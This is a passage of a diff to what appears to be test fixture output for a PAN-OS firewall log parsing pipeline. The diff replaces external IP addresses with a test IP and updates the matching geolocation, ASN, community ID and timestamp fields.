"175.16.199.1" }, - "message": "74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -12260,7 +12267,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:u89cWOeFF4sWlYYJHVB+nr6g6Qg=", + "community_id": "1:nDUNBR/xYCMP799BdvaOhbJMzn0=", "transport": "tcp", "application": "google-maps", "direction": "outbound" @@ -12295,15 +12302,15 @@ "picard" ], "ip": [ - "74.125.224.195", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545959681Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079507600Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -12340,25 +12347,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.239.20" + "ip": "175.16.199.1" }, - "message": "74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -12399,7 +12408,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:QmMWJ0pdk04yRgDj9m6OAKnXpDY=", + "community_id": "1:/XRD8fjQCZ2reh0gJyQK2rfs+Wc=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" @@ -12434,15 +12443,15 @@ "picard" ], "ip": [ - "74.125.239.20", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545966773Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079513200Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -12479,28 +12488,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-NY", - "city_name": "Albany", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "New York", + "region_name": "Jilin", "location": { - "lon": -73.8601, - "lat": 42.7008 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 13536, + "number": 4837, "organization": { - "name": "First Light Fiber" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "66.152.109.24" + "ip": "175.16.199.1" }, - "message": "66.152.109.24,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,\"index.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,\"index.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -12541,7 +12549,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:d3Kvg96HWrCNAfAK3vx2Uqglkdo=", + "community_id": "1:ur+hejcekimZ+EBsduNmTAfLAKk=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" @@ -12576,15 +12584,15 @@ "picard" ], "ip": [ - "66.152.109.24", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545973814Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,66.152.109.24,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,\"index.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079519200Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,\"index.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -12621,25 +12629,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.200" + "ip": "175.16.199.1" }, - "message": "74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -12680,7 +12690,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:+c2DVc+anjtRZ3iRsjbG51UM+JA=", + "community_id": "1:iVCt7y8n4xY4lxHpFzTmtUtGbGw=", "transport": "tcp", "application": "google-maps", "direction": "outbound" @@ -12715,15 +12725,15 @@ "picard" ], "ip": [ - "74.125.224.200", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545980911Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079524900Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -12746,23 +12756,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.201" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -12778,7 +12790,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,74.125.224.201,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -12819,7 +12831,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:5z6QdMj01RaYM1NdZtQSRQgE9gk=", + "community_id": "1:CSr3gOfGhxc2481kFidqrVh2b1o=", "transport": "tcp", "application": "google-analytics", "direction": "inbound" @@ -12855,14 +12867,14 @@ ], "ip": [ "192.168.0.2", - "74.125.224.201", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545987966Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,74.125.224.201,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079531Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -12899,25 +12911,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.200" + "ip": "175.16.199.1" }, - "message": "74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -12958,7 +12972,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Ut9W+vlgpMAH7M4p87nZ/gF7zO8=", + "community_id": "1:y8Rri5paZwSUjfuP8OCSj7AGTaw=", "transport": "tcp", "application": "google-maps", "direction": "outbound" @@ -12993,15 +13007,15 @@ "picard" ], "ip": [ - "74.125.224.200", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545996693Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079536600Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -13038,25 +13052,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.200" + "ip": "175.16.199.1" }, - "message": "74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -13097,7 +13113,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:MNjszUBgbVupAxKdr7W7OIvU2lo=", + "community_id": "1:VbV334KW3Is9ozPo/GT616Kmfs8=", "transport": "tcp", "application": "google-maps", "direction": "outbound" @@ -13132,15 +13148,15 @@ "picard" ], "ip": [ - "74.125.224.200", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.546007615Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079542200Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -13163,23 +13179,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 40428, + "number": 4837, "organization": { - "name": "Pandora Media, Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "208.85.40.48" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -13195,7 +13213,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -13236,7 +13254,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:PzMJQoALQDxnDaqwOEEz4zxyhHU=", + "community_id": "1:hWRgBF3xOOzQR0p2sUrnCEIRsLc=", "transport": "tcp", "application": "pandora", "direction": "inbound" @@ -13272,14 +13290,14 @@ ], "ip": [ "192.168.0.2", - "208.85.40.48", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.546020198Z", - "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:44:49,192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079547800Z", + "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:44:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -13316,25 +13334,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.201" + "ip": "175.16.199.1" }, - "message": "74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -13375,7 +13395,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ThkQfWduH5PZoI7qa/R4rWqT2VM=", + "community_id": "1:5goyhqr2B6bgLWsDzxl1OgXk8mQ=", "transport": "tcp", "application": "google-maps", "direction": "outbound" @@ -13410,15 +13430,15 @@ "jordy" ], "ip": [ - "74.125.224.201", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.546028626Z", - "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079553600Z", + "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -13455,25 +13475,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.201" + "ip": "175.16.199.1" }, - "message": "74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -13514,7 +13536,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Fd/TWc6RIS9q2bsgzztXrAAL4Ek=", + "community_id": "1:y4JV3O9OSznWA8cTxHb1krRrj2U=", "transport": "tcp", "application": "google-maps", "direction": "outbound" @@ -13549,15 +13571,15 @@ "jordy" ], "ip": [ - "74.125.224.201", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.546036048Z", - "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079559200Z", + "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -13594,25 +13616,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.200" + "ip": "175.16.199.1" }, - "message": "74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -13653,7 +13677,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:7gqxhjxtnxyQnsvGukcI+WZWzAY=", + "community_id": "1:Aa48sm/4uPjGhcG+b/Uf7cDELks=", "transport": "tcp", "application": "google-maps", "direction": "outbound" @@ -13688,15 +13712,15 @@ "jordy" ], 